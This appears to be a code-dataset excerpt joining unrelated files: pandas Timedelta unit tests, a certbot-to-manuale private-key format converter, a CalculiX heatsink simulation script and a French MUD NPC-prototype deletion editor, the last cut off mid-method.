assert (td + pd.NaT) is pd.NaT
assert (td * pd.NaT) is pd.NaT
assert (td / pd.NaT) is np.nan
assert (td // pd.NaT) is np.nan
def test_binary_ops_integers(self):
td = Timedelta(10, unit='d')
assert td * 2 == Timedelta(20, unit='d')
assert td / 2 == Timedelta(5, unit='d')
assert td // 2 == Timedelta(5, unit='d')
# invert
assert td * -1 == Timedelta('-10d')
assert -1 * td == Timedelta('-10d')
# can't operate with integers
pytest.raises(TypeError, lambda: td + 2)
pytest.raises(TypeError, lambda: td - 2)
def test_binary_ops_with_timedelta(self):
td = Timedelta(10, unit='d')
assert td - td == Timedelta(0, unit='ns')
assert td + td == Timedelta(20, unit='d')
assert td / td == 1
# invalid multiply with another timedelta
pytest.raises(TypeError, lambda: td * td)
class TestTimedeltaComparison(object):
def test_comparison_object_array(self):
# analogous to GH#15183
td = Timedelta('2 days')
other = Timedelta('3 hours')
arr = np.array([other, td], dtype=object)
res = arr == td
expected = np.array([False, True], dtype=bool)
assert (res == expected).all()
# 2D case
arr = np.array([[other, td],
[td, other]],
dtype=object)
res = arr != td
expected = np.array([[True, False], [False, True]], dtype=bool)
assert res.shape == expected.shape
assert (res == expected).all()
class TestTimedeltas(object):
_multiprocess_can_split_ = True
def setup_method(self, method):
pass
def test_construction(self):
expected = np.timedelta64(10, 'D').astype('m8[ns]').view('i8')
assert Timedelta(10, unit='d').value == expected
assert Timedelta(10.0, unit='d').value == expected
assert Timedelta('10 days').value == expected
assert Timedelta(days=10).value == expected
assert Timedelta(days=10.0).value == expected
expected += np.timedelta64(10, 's').astype('m8[ns]').view('i8')
assert Timedelta('10 days 00:00:10').value == expected
assert Timedelta(days=10, seconds=10).value == expected
assert Timedelta(days=10, milliseconds=10 * 1000).value == expected
assert (Timedelta(days=10, microseconds=10 * 1000 * 1000)
.value == expected)
# gh-8757: test construction with np dtypes
timedelta_kwargs = {'days': 'D',
'seconds': 's',
'microseconds': 'us',
'milliseconds': 'ms',
'minutes': 'm',
'hours': 'h',
'weeks': 'W'}
npdtypes = [np.int64, np.int32, np.int16, np.float64, np.float32,
np.float16]
for npdtype in npdtypes:
for pykwarg, npkwarg in timedelta_kwargs.items():
expected = np.timedelta64(1, npkwarg).astype(
'm8[ns]').view('i8')
assert Timedelta(**{pykwarg: npdtype(1)}).value == expected
# rounding cases
assert Timedelta(82739999850000).value == 82739999850000
assert ('0 days 22:58:59.999850' in str(Timedelta(82739999850000)))
assert Timedelta(123072001000000).value == 123072001000000
assert ('1 days 10:11:12.001' in str(Timedelta(123072001000000)))
# string conversion with/without leading zero
# GH 9570
assert Timedelta('0:00:00') == timedelta(hours=0)
assert Timedelta('00:00:00') == timedelta(hours=0)
assert Timedelta('-1:00:00') == -timedelta(hours=1)
assert Timedelta('-01:00:00') == -timedelta(hours=1)
# more strings & abbrevs
# GH 8190
assert Timedelta('1 h') == timedelta(hours=1)
assert Timedelta('1 hour') == timedelta(hours=1)
assert Timedelta('1 hr') == timedelta(hours=1)
assert Timedelta('1 hours') == timedelta(hours=1)
assert Timedelta('-1 hours') == -timedelta(hours=1)
assert Timedelta('1 m') == timedelta(minutes=1)
assert Timedelta('1.5 m') == timedelta(seconds=90)
assert Timedelta('1 minute') == timedelta(minutes=1)
assert Timedelta('1 minutes') == timedelta(minutes=1)
assert Timedelta('1 s') == timedelta(seconds=1)
assert Timedelta('1 second') == timedelta(seconds=1)
assert Timedelta('1 seconds') == timedelta(seconds=1)
assert Timedelta('1 ms') == timedelta(milliseconds=1)
assert Timedelta('1 milli') == timedelta(milliseconds=1)
assert Timedelta('1 millisecond') == timedelta(milliseconds=1)
assert Timedelta('1 us') == timedelta(microseconds=1)
assert Timedelta('1 micros') == timedelta(microseconds=1)
assert Timedelta('1 microsecond') == timedelta(microseconds=1)
assert Timedelta('1.5 microsecond') == Timedelta('00:00:00.000001500')
assert Timedelta('1 ns') == Timedelta('00:00:00.000000001')
assert Timedelta('1 nano') == Timedelta('00:00:00.000000001')
assert Timedelta('1 nanosecond') == Timedelta('00:00:00.000000001')
# combos
assert Timedelta('10 days 1 hour') == timedelta(days=10, hours=1)
assert Timedelta('10 days 1 h') == timedelta(days=10, hours=1)
assert Timedelta('10 days 1 h 1m 1s') == timedelta(
days=10, hours=1, minutes=1, seconds=1)
assert Timedelta('-10 days 1 h 1m 1s') == -timedelta(
days=10, hours=1, minutes=1, seconds=1)
assert Timedelta('-10 days 1 h 1m 1s') == -timedelta(
days=10, hours=1, minutes=1, seconds=1)
assert Timedelta('-10 days 1 h 1m 1s 3us') == -timedelta(
days=10, hours=1, minutes=1, seconds=1, microseconds=3)
assert Timedelta('-10 days 1 h 1.5m 1s 3us'), -timedelta(
days=10, hours=1, minutes=1, seconds=31, microseconds=3)
# Currently invalid as it has a - on the hh:mm:dd part
# (only allowed on the days)
pytest.raises(ValueError,
lambda: Timedelta('-10 days -1 h 1.5m 1s 3us'))
# only leading neg signs are allowed
pytest.raises(ValueError,
lambda: Timedelta('10 days -1 h 1.5m 1s 3us'))
# no units specified
pytest.raises(ValueError, lambda: Timedelta('3.1415'))
# invalid construction
tm.assert_raises_regex(ValueError, "cannot construct a Timedelta",
lambda: Timedelta())
tm.assert_raises_regex(ValueError,
"unit abbreviation w/o a number",
lambda: Timedelta('foo'))
tm.assert_raises_regex(ValueError,
"cannot construct a Timedelta from the "
"passed arguments, allowed keywords are ",
lambda: Timedelta(day=10))
# round-trip both for string and value
for v in ['1s', '-1s', '1us', '-1us', '1 day', '-1 day',
'-23:59:59.999999', '-1 days +23:59:59.999999', '-1ns',
'1ns', '-23:59:59.999999999']:
td = Timedelta(v)
assert Timedelta(td.value) == td
# str does not normally display nanos
if not td.nanoseconds:
assert Timedelta(str(td)) == td
assert Timedelta(td._repr_base(format='all')) == td
# floats
expected = np.timedelta64(
10, 's').astype('m8[ns]').view('i8') + np.timedelta64(
500, 'ms').astype('m8[ns]').view('i8')
assert Timedelta(10.5, unit='s').value == expected
# offset
assert (to_timedelta(pd.offsets.Hour(2)) ==
Timedelta('0 days, 02:00:00'))
assert (Timedelta(pd.offsets.Hour(2)) ==
Timedelta('0 days, 02:00:00'))
assert (Timedelta(pd.offsets.Second(2)) ==
Timedelta('0 days, 00:00:02'))
# gh-11995: unicode
expected = Timedelta('1H')
result = pd.Timedelta(u'1H')
assert result == expected
assert (to_timedelta(pd.offsets.Hour(2)) ==
Timedelta(u'0 days, 02:00:00'))
pytest.raises(ValueError, lambda: Timedelta(u'foo bar'))
def test_overflow_on_construction(self):
# xref https://github.com/statsmodels/statsmodels/issues/3374
value = pd.Timedelta('1day').value * 20169940
pytest.raises(OverflowError, pd.Timedelta, value)
# xref gh-17637
with pytest.raises(OverflowError):
pd.Timedelta(7 * 19999, unit='D')
with pytest.raises(OverflowError):
pd.Timedelta(timedelta(days=13 * 19999))
def test_total_seconds_scalar(self):
# see gh-10939
rng = Timedelta('1 days, 10:11:12.100123456')
expt = 1 * 86400 + 10 * 3600 + 11 * 60 + 12 + 100123456. / 1e9
tm.assert_almost_equal(rng.total_seconds(), expt)
rng = Timedelta(np.nan)
assert np.isnan(rng.total_seconds())
def test_repr(self):
assert (repr(Timedelta(10, unit='d')) ==
"Timedelta('10 days 00:00:00')")
assert (repr(Timedelta(10, unit='s')) ==
"Timedelta('0 days 00:00:10')")
assert (repr(Timedelta(10, unit='ms')) ==
"Timedelta('0 days 00:00:00.010000')")
assert (repr(Timedelta(-10, unit='ms')) ==
"Timedelta('-1 days +23:59:59.990000')")
def test_conversion(self):
for td in [Timedelta(10, unit='d'),
Timedelta('1 days, 10:11:12.012345')]:
pydt = td.to_pytimedelta()
assert td == Timedelta(pydt)
assert td == pydt
assert (isinstance(pydt, timedelta) and not isinstance(
pydt, Timedelta))
assert td == np.timedelta64(td.value, 'ns')
td64 = td.to_timedelta64()
assert td64 == np.timedelta64(td.value, 'ns')
assert td == td64
assert isinstance(td64, np.timedelta64)
# this is NOT equal and cannot be roundtriped (because of the nanos)
td = Timedelta('1 days, 10:11:12.012345678')
assert td != td.to_pytimedelta()
def test_freq_conversion(self):
# truediv
td = Timedelta('1 days 2 hours 3 ns')
result = td / np.timedelta64(1, 'D')
assert result == td.value / float(86400 * 1e9)
result = td / np.timedelta64(1, 's')
assert result == td.value / float(1e9)
result = td / np.timedelta64(1, 'ns')
assert result == td.value
# floordiv
td = Timedelta('1 days 2 hours 3 ns')
result = td // np.timedelta64(1, 'D')
assert result == 1
result = td // np.timedelta64(1, 's')
assert result == 93600
result = td // np.timedelta64(1, 'ns')
assert result == td.value
def test_fields(self):
def check(value):
# that we are int/long like
assert isinstance(value, (int, compat.long))
# compat to datetime.timedelta
rng = to_timedelta('1 days, 10:11:12')
assert rng.days == 1
assert rng.seconds == 10 * 3600 + 11 * 60 + 12
assert rng.microseconds == 0
assert rng.nanoseconds == 0
pytest.raises(AttributeError, lambda: rng.hours)
pytest.raises(AttributeError, lambda: rng.minutes)
pytest.raises(AttributeError, lambda: rng.milliseconds)
# GH 10050
check(rng.days)
check(rng.seconds)
check(rng.microseconds)
check(rng.nanoseconds)
td = Timedelta('-1 days, 10:11:12')
assert abs(td) == Timedelta('13:48:48')
assert str(td) == "-1 days +10:11:12"
assert -td == Timedelta('0 days 13:48:48')
assert -Timedelta('-1 days, 10:11:12').value == 49728000000000
assert Timedelta('-1 days, 10:11:12').value == -49728000000000
rng = to_timedelta('-1 days, 10:11:12.100123456')
assert rng.days == -1
assert rng.seconds == 10 * 3600 + 11 * 60 + 12
assert rng.microseconds == 100 * 1000 + 123
assert rng.nanoseconds == 456
pytest.raises(AttributeError, lambda: rng.hours)
pytest.raises(AttributeError, lambda: rng.minutes)
pytest.raises(AttributeError, lambda: rng.milliseconds)
# components
tup = pd.to_timedelta(-1, 'us').components
assert tup.days == -1
assert tup.hours == 23
assert tup.minutes == 59
assert tup.seconds == 59
assert tup.milliseconds == 999
assert tup.microseconds == 999
assert tup.nanoseconds == 0
# GH 10050
check(tup.days)
check(tup.hours)
check(tup.minutes)
check(tup.seconds)
check(tup.milliseconds)
check(tup.microseconds)
check(tup.nanoseconds)
tup = Timedelta('-1 days 1 us').components
assert tup.days == -2
assert tup.hours == 23
assert tup.minutes == 59
assert tup.seconds == 59
assert tup.milliseconds == 999
assert tup.microseconds == 999
assert tup.nanoseconds == 0
def test_nat_converters(self):
assert to_timedelta('nat', box=False).astype('int64') == iNaT
assert to_timedelta('nan', box=False).astype('int64') == iNaT
def testit(unit, transform):
# array
result = to_timedelta(np.arange(5), unit=unit)
expected = TimedeltaIndex([np.timedelta64(i, transform(unit))
for i in np.arange(5).tolist()])
tm.assert_index_equal(result, expected)
# scalar
result = to_timedelta(2, unit=unit)
expected = Timedelta(np.timedelta64(2, transform(unit)).astype(
'timedelta64[ns]'))
assert result == expected
# validate all units
# GH 6855
for unit in ['Y', 'M', 'W', 'D', 'y', 'w', 'd']:
testit(unit, lambda x: x.upper())
for unit in ['days', 'day', 'Day', 'Days']:
testit(unit, lambda x: 'D')
for unit in ['h', 'm', 's', 'ms', 'us', 'ns', 'H', 'S', 'MS', 'US',
'NS']:
testit(unit, lambda x: x.lower())
# offsets
# m
testit('T', lambda x: 'm')
# ms
testit('L', lambda x: 'ms')
def test_numeric_conversions(self):
assert ct(0) == np.timedelta64(0, 'ns')
assert ct(10) == np.timedelta64(10, 'ns')
assert ct(10, unit='ns') == np.timedelta64(10, 'ns').astype('m8[ns]')
assert ct(10, unit='us') == np.timedelta64(10, 'us').astype('m8[ns]')
assert ct(10, unit='ms') == np.timedelta64(10, 'ms').astype('m8[ns]')
assert ct(10, unit='s') == np.timedelta64(10, 's').astype('m8[ns]')
assert ct(10, unit='d') == np.timedelta64(10, 'D').astype('m8[ns]')
def test_timedelta_conversions(self):
assert (ct(timedelta(seconds=1)) ==
np.timedelta64(1, 's').astype('m8[ns]'))
assert (ct(timedelta(microseconds=1)) ==
np.timedelta64(1, 'us').astype('m8[ns]'))
assert (ct(timedelta(days=1)) ==
np.timedelta64(1, 'D').astype('m8[ns]'))
def test_round(self):
t1 = Timedelta('1 days 02:34:56.789123456')
t2 = Timedelta('-1 days 02:34:56.789123456')
for (freq, s1, s2) in [('N', t1, t2),
('U', Timedelta('1 days 02:34:56.789123000'),
Timedelta('-1 days 02:34:56.789123000')),
('L', Timedelta('1 days 02:34:56.789000000'),
Timedelta('-1 days 02:34:56.789000000')),
('S', Timedelta('1 days 02:34:57'),
Timedelta('-1 days 02:34:57')),
('2S', Timedelta('1 days 02:34:56'),
Timedelta('-1 days 02:34:56')),
('5S', Timedelta('1 days 02:34:55'),
Timedelta('-1 days 02:34:55')),
('T', Timedelta('1 days 02:35:00'),
Timedelta('-1 days 02:35:00')),
('12T', Timedelta('1 days 02:36:00'),
Timedelta('-1 days 02:36:00')),
('H', Timedelta('1 days 03:00:00'),
Timedelta('-1 days 03:00:00')),
('d', Timedelta('1 days'),
Timedelta('-1 days'))]:
r1 = t1.round(freq)
assert r1 == s1
r2 = t2.round(freq)
assert r2 == s2
# invalid
for freq in ['Y', 'M', 'foobar']:
pytest.raises(ValueError, lambda: t1.round(freq))
t1 = timedelta_range('1 days', periods=3, freq='1 min 2 s 3 us')
t2 = -1 * t1
t1a = timedelta_range('1 days', periods=3, freq='1 min 2 s')
t1c = pd.TimedeltaIndex([1, 1, 1], unit='D')
# note that negative times round DOWN! so don't give whole numbers
for (freq, s1, s2) in [('N', t1, t2),
('U', t1, t2),
('L', t1a,
TimedeltaIndex(['-1 days +00:00:00',
'-2 days +23:58:58',
'-2 days +23:57:56'],
dtype='timedelta64[ns]',
freq=None)
),
('S', t1a,
TimedeltaIndex(['-1 days +00:00:00',
'-2 days +23:58:58',
'-2 days +23:57:56'],
dtype='timedelta64[ns]',
freq=None)
),
('12T', t1c,
TimedeltaIndex(['-1 days',
'-1 days',
'-1 days'],
dtype='timedelta64[ns]',
freq=None)
),
('H', t1c,
TimedeltaIndex(['-1 days',
'-1 days',
'-1 days'],
dtype='timedelta64[ns]',
freq=None)
),
('d', t1c,
pd.TimedeltaIndex([-1, -1, -1], unit='D')
)]:
r1 = t1.round(freq)
tm.assert_index_equal(r1, s1)
r2 = t2.round(freq)
tm.assert_index_equal(r2, s2)
# invalid
for freq in ['Y', 'M', 'foobar']:
pytest.raises(ValueError, lambda: t1.round(freq))
def test_contains(self):
# Checking for any NaT-like objects
# GH 13603
td = to_timedelta(range(5), unit='d') + pd.offsets.Hour(1)
for v in [pd.NaT, None, float('nan'), np.nan]:
assert not (v in td)
td = to_timedelta([pd.NaT])
for v in [pd.NaT, None, float('nan'), np.nan]:
assert (v in td)
def test_identity(self):
td = Timedelta(10, unit='d')
assert isinstance(td, Timedelta)
assert isinstance(td, timedelta)
def test_short_format_converters(self):
def conv(v):
return v.astype('m8[ns]')
assert ct('10') == np.timedelta64(10, 'ns')
assert ct('10ns') == np.timedelta64(10, 'ns')
assert ct('100') == np.timedelta64(100, 'ns')
assert ct('100ns') == np.timedelta64(100, 'ns')
assert ct('1000') == np.timedelta64(1000, 'ns')
assert ct('1000ns') == np.timedelta64(1000, 'ns')
assert ct('1000NS') == np.timedelta64(1000, 'ns')
assert ct('10us') == np.timedelta64(10000, 'ns')
assert ct('100us') == np.timedelta64(100000, 'ns')
assert ct('1000us') == np.timedelta64(1000000, 'ns')
assert ct('1000Us') == np.timedelta64(1000000, 'ns')
assert ct('1000uS') == np.timedelta64(1000000, 'ns')
assert ct('1ms') == np.timedelta64(1000000, 'ns')
assert ct('10ms') == np.timedelta64(10000000, 'ns')
assert ct('100ms') == np.timedelta64(100000000, 'ns')
assert ct('1000ms') == np.timedelta64(1000000000, 'ns')
assert ct('-1s') == -np.timedelta64(1000000000, 'ns')
assert ct('1s') == np.timedelta64(1000000000, 'ns')
assert ct('10s') == np.timedelta64(10000000000, 'ns')
assert ct('100s') == np.timedelta64(100000000000, 'ns')
assert ct('1000s') == np.timedelta64(1000000000000, 'ns')
assert ct('1d') == conv(np.timedelta64(1, 'D'))
assert ct('-1d') == -conv(np.timedelta64(1, 'D'))
assert ct('1D') == conv(np.timedelta64(1, 'D'))
assert ct('10D') == conv(np.timedelta64(10, 'D'))
assert ct('100D') == conv(np.timedelta64(100, 'D'))
assert ct('1000D') == conv(np.timedelta64(1000, 'D'))
assert ct('10000D') == conv(np.timedelta64(10000, 'D'))
# space
assert ct(' 10000D ') == conv(np.timedelta64(10000, 'D'))
assert ct(' - 10000D ') == -conv(np.timedelta64(10000, 'D'))
# invalid
pytest.raises(ValueError, ct, '1foo')
pytest.raises(ValueError, ct, 'foo')
def test_full_format_converters(self):
def conv(v):
return v.astype('m8[ns]')
d1 = np.timedelta64(1, 'D')
assert ct('1days') == conv(d1)
assert ct('1days,') == conv(d1)
assert ct('- 1days,') == -conv(d1)
assert ct('00:00:01') == conv(np.timedelta64(1, 's'))
assert ct('06:00:01') == conv(np.timedelta64(6 * 3600 + 1, 's'))
assert ct('06:00:01.0') == conv(np.timedelta64(6 * 3600 + 1, 's'))
assert ct('06:00:01.01') == conv(np.timedelta64(
1000 * (6 * 3600 + 1) + 10, 'ms'))
assert (ct('- 1days, 00:00:01') ==
conv(-d1 + np.timedelta64(1, 's')))
assert (ct('1days, 06:00:01') ==
conv(d1 + np.timedelta64(6 * 3600 + 1, 's')))
assert (ct('1days, 06:00:01.01') ==
conv(d1 + np.timedelta64(1000 * (6 * 3600 + 1) + 10, 'ms')))
# invalid
pytest.raises(ValueError, ct, '- 1days, 00')
def test_overflow(self):
# GH 9442
s = Series(pd.date_range('20130101', periods=100000, freq='H'))
s[0] += pd.Timedelta('1s 1ms')
# mean
result = (s - s.min()).mean()
expected = pd.Timedelta((pd.DatetimeIndex((s - s.min())).asi8 / len(s)
).sum())
# the computation is converted to float so
# might be some loss of precision
assert np.allclose(result.value / 1000, expected.value / 1000)
# sum
pytest.raises(ValueError, lambda: (s - s.min()).sum())
s1 = s[0:10000]
pytest.raises(ValueError, lambda: (s1 - s1.min()).sum())
s2 = s[0:1000]
result = (s2 - s2.min()).sum()
def test_pickle(self):
v = Timedelta('1 days 10:11:12.0123456')
v_p = tm.round_trip_pickle(v)
assert v == v_p
def test_timedelta_hash_equality(self):
# GH 11129
v = Timedelta(1, 'D')
td = timedelta(days=1)
assert hash(v) == hash(td)
d = {td: 2}
assert d[v] == 2
tds = timedelta_range('1 second', periods=20)
assert all(hash(td) == hash(td.to_pytimedelta()) for td in tds)
# python timedeltas drop ns resolution
ns_td = Timedelta(1, 'ns')
assert hash(ns_td) != hash(ns_td.to_pytimedelta())
def test_implementation_limits(self):
min_td = Timedelta(Timedelta.min)
max_td = Timedelta(Timedelta.max)
# GH 12727
# timedelta limits correspond to int64 boundaries
assert min_td.value == np.iinfo(np.int64).min + 1
assert max_td.value == np.iinfo(np.int64).max
# Beyond lower limit, a NAT before the Overflow
assert (min_td - Timedelta(1, 'ns')) is NaT
with pytest.raises(OverflowError):
min_td - Timedelta(2, 'ns')
with pytest.raises(OverflowError):
max_td + Timedelta(1, 'ns')
# Same tests using the internal nanosecond values
td = Timedelta(min_td.value - 1, 'ns')
assert td is NaT
with pytest.raises(OverflowError):
Timedelta(min_td.value - 2, 'ns')
with pytest.raises(OverflowError):
Timedelta(max_td.value + 1, 'ns')
def test_timedelta_arithmetic(self):
data = pd.Series(['nat', '32 days'], dtype='timedelta64[ns]')
deltas = [timedelta(days=1), Timedelta(1, unit='D')]
for delta in deltas:
result_method = data.add(delta)
result_operator = data + delta
expected = pd.Series(['nat', '33 days'], dtype='timedelta64[ns]')
tm.assert_series_equal(result_operator, expected)
tm.assert_series_equal(result_method, expected)
result_method = data.sub(delta)
result_operator = data - delta
expected = pd.Series(['nat', '31 days'], dtype='timedelta64[ns]')
tm.assert_series_equal(result_operator, expected)
tm.assert_series_equal(result_method, expected)
# GH 9396
result_method = data.div(delta)
result_operator = data / delta
expected = pd.Series([np.nan, 32.], dtype='float64')
tm.assert_series_equal(result_operator, expected)
tm.assert_series_equal(result_method, expected)
def test_apply_to_timedelta(self):
timedelta_NaT = pd.to_timedelta('NaT')
list_of_valid_strings = ['00:00:01', '00:00:02']
a = pd.to_timedelta(list_of_valid_strings)
b = Series(list_of_valid_strings).apply(pd.to_timedelta)
# Can't compare until apply on a Series gives the correct dtype
# assert_series_equal(a, b)
list_of_strings = ['00:00:01', np.nan, pd.NaT, timedelta_NaT]
# TODO: unused?
a = pd.to_timedelta(list_of_strings) # noqa
b = Series(list_of_strings).apply(pd.to_timedelta) # noqa
# Can't compare until apply on a Series gives the correct dtype
# assert_series_equal(a, b)
def test_components(self):
rng = timedelta_range('1 days, 10:11:12', periods=2, freq='s')
rng.components
# with nat
s = Series(rng)
s[1] = np.nan
result = s.dt.components
assert not result.iloc[0].isna().all()
assert result.iloc[1].isna().all()
def test_isoformat(self):
td = Timedelta(days=6, minutes=50, seconds=3,
milliseconds=10, microseconds=10, nanoseconds=12)
expected = 'P6DT0H50M3.010010012S'
result = td.isoformat()
assert result == expected
td = Timedelta(days=4, hours=12, minutes=30, seconds=5)
result = td.isoformat()
expected = 'P4DT12H30M5S'
assert result == expected
td = Timedelta(nanoseconds=123)
result = td.isoformat()
expected = 'P0DT0H0M0.000000123S'
assert result == expected
# trim nano
td = Timedelta(microseconds=10)
result = td.isoformat()
expected = 'P0DT0H0M0.00001S'
assert result == expected
# trim micro
td = Timedelta(milliseconds=1)
result = td.isoformat()
expected = 'P0DT0H0M0.001S'
assert result == expected
# don't strip every 0
result = Timedelta(minutes=1).isoformat()
expected = 'P0DT0H1M0S'
assert result == expected
| bsd-3-clause | 3,114,407,795,892,254,000 | 37.608187 | 79 | 0.526022 | false |
szepeviktor/debian-server-tools | security/jwk_convert.py | 1 | 1364 | #!/usr/bin/python
"""Convert certbot private_key.json to manuale's account.json
Source: https://gist.github.com/JonLundy/f25c99ee0770e19dc595
./jwk_convert.py private_key.json > private-key.asn1
openssl asn1parse -genconf private-key.asn1 -noout -out private-key.der
openssl rsa -inform DER -in private-key.der -outform PEM -out private-key.key
echo -n '{"key": "' > account.json
paste -s -d '|' private-key.key | sed -e 's/|/\\n/g' | tr -d '\n' >> account.json
echo '", "uri": "https://acme-v01.api.letsencrypt.org/acme/reg/9999999"}' >> account.json # From regr.json
"""
import sys
import json
import base64
import binascii
with open(sys.argv[1]) as fp:
PKEY = json.load(fp)
def enc(data):
missing_padding = 4 - len(data) % 4
if missing_padding:
data += b'=' * missing_padding
return '0x'+binascii.hexlify(base64.b64decode(data, b'-_')).upper()
for k, v in PKEY.items():
if k == 'kty':
continue
PKEY[k] = enc(v.encode())
print "asn1=SEQUENCE:private_key\n[private_key]\nversion=INTEGER:0"
print "n=INTEGER:{}".format(PKEY[u'n'])
print "e=INTEGER:{}".format(PKEY[u'e'])
print "d=INTEGER:{}".format(PKEY[u'd'])
print "p=INTEGER:{}".format(PKEY[u'p'])
print "q=INTEGER:{}".format(PKEY[u'q'])
print "dp=INTEGER:{}".format(PKEY[u'dp'])
print "dq=INTEGER:{}".format(PKEY[u'dq'])
print "qi=INTEGER:{}".format(PKEY[u'qi'])
| mit | -5,849,783,586,539,344,000 | 32.268293 | 106 | 0.66349 | false |
zagl/ccx-user | tutorials/auto/geom.py | 1 | 3805 | #!/usr/bin/env python3
import pycgx
import re
import fileinput
import subprocess
def heatSinkTemp(length, width, height, n_fins, fin_width,
base_width, conductivity, ta, emissivity, flux):
fin_spacing = (width- fin_width) /(n_fins -1) - fin_width
flux_density = flux / (length*width)
c = pycgx.Cgx()
heatsink = c.makeHeatsink(
[0., 0., 0.],
[length, width, height],
n_fins, fin_width, base_width,
[4,2,2],
'heatsink'
)
top = c.makeSet("ht")
top.add(heatsink.maxX)
bottom = c.makeSet("hb")
bottom.add(heatsink.minX)
channel = c.makeSet("hc")
channel.add(heatsink.inside)
walls = c.makeSet("hw")
walls.add(heatsink.minZ)
walls.add(heatsink.maxZ)
walls.add(heatsink.minY)
walls.add(heatsink.maxY)
rad = c.makeSet('rad')
rad.add(heatsink.inside)
rad.add(heatsink.minX)
rad.add(heatsink.maxX)
rad.add(heatsink.minY)
rad.add(heatsink.maxY)
rad.add(heatsink.maxZ)
flux = c.makeSet("flux")
flux.add(heatsink.minZ)
c.meshLinear()
c.sendMesh()
top.sendFilm()
bottom.sendFilm()
channel.sendFilm()
walls.sendFilm()
rad.sendRadiate()
flux.sendFlux()
c.write('send.fbd')
out = subprocess.getoutput('cgx -bg send.fbd')
l_hor = fin_width*height/(2*(fin_width+height))
with fileinput.FileInput('ht.flm', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(F[0-9]).*', r'\1NUT {0:d}; {1:0.3e}'\
.format(int(ta), l_hor), line), end='')
with fileinput.FileInput('hb.flm', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(F[0-9]).*', r'\1NUB {0:d}; {1:0.3e}'\
.format(int(ta), l_hor), line), end='')
with fileinput.FileInput('hw.flm', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(F[0-9]).*', r'\1NUW {0:d}; {1:0.3e}'\
.format(int(ta), length), line), end='')
with fileinput.FileInput('hc.flm', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(F[0-9]).*', r'\1NUC {0:d}; {1:3d}; {2:d}'\
.format(int(ta), int(length*1000), int(fin_spacing*1e6)),
line, ), end='')
with fileinput.FileInput('rad.rad', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(R[0-9])', r'\1CR', line), end='')
case_deck = '''\
*INCLUDE, INPUT=all.msh
*MATERIAL, Name=Aluminium
*CONDUCTIVITY
%f,0.
*SOLID SECTION, Elset=Eall, Material=Aluminium
*PHYSICAL CONSTANTS,ABSOLUTE ZERO=-273.15,STEFAN BOLTZMANN=5.669E-8
*INITIAL CONDITIONS,TYPE=TEMPERATURE
Nall, %f
*AMPLITUDE, NAME=Aflux
0., %f
*AMPLITUDE, NAME=AinfTemp
0., %f
*AMPLITUDE, NAME=ARad
0., %f
*STEP
*HEAT TRANSFER,STEADY STATE
*DFLUX, AMPLITUDE=Aflux
*INCLUDE, INPUT=flux.dfl
*FILM
*INCLUDE, INPUT=hb.flm
*INCLUDE, INPUT=ht.flm
*INCLUDE, INPUT=hw.flm
*INCLUDE, INPUT=hc.flm
*RADIATE, AMPLITUDE=AinfTemp, RADIATION AMPLITUDE=ARad
*INCLUDE, INPUT=rad.rad
*EL FILE
HFL
*NODE FILE
NT,RFL
*END STEP''' % (conductivity, ta, flux_density, ta, emissivity)
with open('case.inp', 'w') as fobj:
fobj.write(case_deck)
out = subprocess.getoutput('../../application/ccx case')
eval_fbd = '''\
read case.frd
ds 1 e 1'''
with open('eval.fbd', 'w') as fobj:
fobj.write(eval_fbd)
out = subprocess.getoutput('cgx -bg eval.fbd | grep max')
return float(out[5:17])
#for n in range(2,20):
if True:
n = 9
t = heatSinkTemp(
length = 0.113,
width = 0.075,
height = 0.026,
n_fins = 9,
fin_width = 2.2e-3,
base_width = 11e-3,
conductivity = 120.,
ta = 20.,
emissivity = 0.1,
flux = 14.,
)
print(n, t)
| gpl-2.0 | 7,893,655,362,739,145,000 | 23.548387 | 73 | 0.583443 | false |
stormi/tsunami | src/primaires/pnj/editeurs/pedit/supprimer.py | 1 | 2851 | # -*-coding:Utf-8 -*
# Copyright (c) 2013 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant le contexte éditeur Supprimer"""
from primaires.interpreteur.editeur.supprimer import Supprimer
class NSupprimer(Supprimer):
"""Classe définissant le contexte éditeur 'supprimer'.
Ce contexte permet spécifiquement de supprimer un prototype de PNJ.
"""
def interpreter(self, msg):
"""Interprétation du contexte"""
msg = msg.lower()
prototype = self.objet
if msg == "oui":
objet = type(self).importeur
for nom in self.action.split("."):
objet = getattr(objet, nom)
nb_objets = len(prototype.pnj)
if nb_objets > 0:
s = nb_objets > 1 and "s" or ""
nt = nb_objets > 1 and "nt" or ""
self.pere << "|err|{} PNJ{s} existe{nt} modelé{s} sur ce " \
"prototype. Opération annulée.|ff|".format(nb_objets,
s=s, nt=nt)
self.migrer_contexte(self.opts.rci_ctx_prec)
else:
objet(self.objet.cle)
self.fermer()
self.pere << self.confirme
elif msg == "non":
self.migrer_contexte(self.opts.rci_ctx_prec)
else:
